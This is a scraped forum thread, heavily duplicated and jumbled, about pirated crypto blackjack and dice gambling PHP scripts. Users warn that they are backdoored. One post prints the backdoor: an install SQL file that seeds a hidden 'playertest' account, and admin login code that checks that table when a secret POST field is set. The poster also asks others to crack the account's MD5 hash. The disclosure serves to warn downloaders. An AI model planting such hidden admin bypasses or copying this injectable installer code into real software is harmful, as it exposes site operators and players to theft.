confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?
So true...best option: develop your own script!
Topic: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts - page 2. (Read 6599 times)
So true...best option: develop your own script!
confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?
due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.
And it's also copyrighted. Please stop sharing our scripts for free.
SCAMMER
I recommend everyone not to download this backdoored versions of our software. These are not even the latest versions and contain security bugs.
If you buy full license from us, you'll get free lifetime support + updates. See my signature.
I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.
are there many open source gambling scripts with backdoors on github?
I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.
Well, that didn't take long. At least for the blackjack, this is a pirate copy of johny1976's coinjack.
Install from the OP
Install from official Coinjack:
Well, that didn't take long. At least for the blackjack, this is a pirate copy of johny1976's coinjack.
Install from the OP
Code:
if (isset($_GET['checkCons'])) {
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
As I said...but he meant that he fixed some bugs.
I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.
I will post my findings soon.
Backdoor Found
CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Everybody should remove this ASAP. You don't know what else could be hidden in here.
I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.
cloverme, I am assuming you have the original game? What line is meant to be in login.php?
I will post my findings soon.
Backdoor Found
CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
Everybody should remove this ASAP. You don't know what else could be hidden in here.
I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.
cloverme, I am assuming you have the original game? What line is meant to be in login.php?
I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.
Well, that didn't take long. At least for the blackjack, this is a pirate copy of johny1976's coinjack.
Install from the OP
Install from official Coinjack:
Well, that didn't take long. At least for the blackjack, this is a pirate copy of johny1976's coinjack.
Install from the OP
Code:
if (isset($_GET['checkCons'])) {
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
header('Location: ./?step=3&db');
exit();
}
$included_=true;
include __DIR__.'/db_data.php';
$db_file=fopen('../inc/db-conf.php','wb');
fwrite($db_file,"\n");
fwrite($db_file,'$conf_c=true;'."\n");
fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
fwrite($db_file,"?>"); ?> fclose($db_file);
Problem
Whist installing the blackjack game I have noticed a problem with the login, I wouldnt suggest downloading this until I have fixed it as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else.
Whist installing the blackjack game I have noticed a problem with the login, I wouldnt suggest downloading this until I have fixed it as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else.
of course, send me your suggestions. I will see if I can implement them.
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
Hi, I am working on a couple which will be released in the next week
Thank You for your positive feedback.
I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?
@felinegambler could You do a hold'em script? against payment without a backdoor
Yeah of course, Its something a started a while back which I been meaning to finish.
The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.
I will get to work on the Hold'Em game tonight, As personally its my favorite game.
thanks for the good work. may I PM you regarding the holdem? because I have my own holdem idea and would like to know
if You can/would do it and I sure wanna pay for it.
Hi Muhammed,
where can I find the option for the demo?
It can also be a rip-off of Johnys script.
where can I find the option for the demo?
It can also be a rip-off of Johnys script.
Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it!
It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
Can you please post pics like LOBSTER said? And, please reply to my question. Thanks!
~~MZ~~
Of course, I will get some pics when I am back home tonight and put them on this thread.
Thanks for the github.io link, I will see if I can upload a demo also.
hero member
Activity: 560
Merit: 509
I prefer Zakir over Muhammed when mentioning me!
Hi Muhammed,
where can I find the option for the demo?
It can also be a rip-off of Johnys script.
where can I find the option for the demo?
It can also be a rip-off of Johnys script.
Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it!
It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
Can you please post pics like LOBSTER said? And, please reply to my question. Thanks!
~~MZ~~
It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
Thanks! Nice work!
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
Hi, I am working on a couple which will be released in the next week
Thank You for your positive feedback.
I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?
@felinegambler could You do a hold'em script? against payment without a backdoor
Yeah of course, Its something a started a while back which I been meaning to finish.
The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.
I will get to work on the Hold'Em game tonight, As personally its my favorite game.
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
Hi, I am working on a couple which will be released in the next week
Thank You for your positive feedback.
I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?
@felinegambler could You do a hold'em script? against payment without a backdoor
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
Hi, I am working on a couple which will be released in the next week
Thank You for your positive feedback.
Working perfectly for me so far.
I was wondering though are there going to be any theme updates?
thanks.
I was wondering though are there going to be any theme updates?
thanks.
It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.
Anyway... Its now on github for people to share and distribute freely.
Can you show some screenshots? Before downloading and installing, I want to see it 
You can use Github for demos. They offer making sites for the Github repos.
But it's not the script from Johny1976?
Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses.
~~MZ~~
Hi Muhammed,
where can I find the option for the demo?
It can also be a rip-off of Johnys script.
hero member
Activity: 560
Merit: 509
I prefer Zakir over Muhammed when mentioning me!
But it's not the script from Johny1976?
Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses.
~~MZ~~
Jump to: